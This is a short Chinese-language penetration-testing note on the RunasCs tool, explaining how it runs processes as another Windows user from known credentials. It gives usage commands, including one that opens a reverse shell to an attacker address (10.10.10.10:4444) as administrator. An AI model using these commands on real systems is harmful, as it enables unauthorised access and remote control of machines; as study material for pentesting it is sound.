RunasCS使用

created: "2025-03-14 21:19"
tags:
  - RunasCS
  - SeImpersonatePrivilege
  - LPE
Type: Note
aliases:
  - RunasCS
updated: "2025-12-12 00:04"

1. 介绍

项目地址 https://github.com/antonioCoco/RunasCs

该工具允许我们以本地用户上下文切换到其他用户，这对于遇到有凭据但无远程登录权限的情况很有用。

条件

需要另一个用户的账号密码

原理简述
RunasCS 利用 Windows 的利用 CreateProcessWithLogonW 或 CreateProcessWithTokenW API，在本地创建指定用户上下文的新进程，从而实现权限切换，而无需交互式登录或远程桌面权限。

2. 使用

# 基本语法：执行单条命令
.\runascs.exe <用户名> <密码> "<命令>"
# 示例：查看新上下文下的用户信息
.\runascs.exe administrator P@ssw0rd123 "cmd /c whoami /all"

# 语法：生成反向Shell（常用于渗透测试）
.\runascs.exe <用户名> <密码> cmd.exe -r <攻击机IP>:<端口>
# 示例：连接到10.10.10.10的4444端口
.\runascs.exe administrator P@ssw0rd123 cmd.exe -r 10.10.10.10:4444